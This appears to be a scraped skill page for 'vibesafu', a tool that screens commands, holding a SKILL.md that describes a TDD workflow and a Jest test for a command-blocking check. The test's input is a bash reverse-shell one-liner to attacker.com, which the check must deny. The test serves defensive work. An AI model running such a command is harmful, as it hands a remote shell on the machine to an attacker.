Execute qualquer Skill no Manus
com um clique
com um clique
Execute qualquer Skill no Manus com um clique
Começar$pwd:
$ git log --oneline --stat
stars:8
forks:0
updated:7 de fevereiro de 2026 às 12:10
SKILL.md
| name | tdd-workflow |
| description | vibesafu TDD workflow. Required for implementing security logic. |
RED - Write failing test
GREEN - Pass with minimal code
REFACTOR - Clean up
describe('InstantBlock', () => {
it('should block reverse shell patterns', () => {
const input = 'bash -i >& /dev/tcp/attacker.com/4444 0>&1';
expect(checkInstantBlock(input)).toEqual({
behavior: 'deny',
message: expect.stringContaining('reverse shell')
});
});
it('should allow normal bash commands', () => {
const input = 'npm install lodash';
expect(checkInstantBlock(input)).toBeNull();
});
});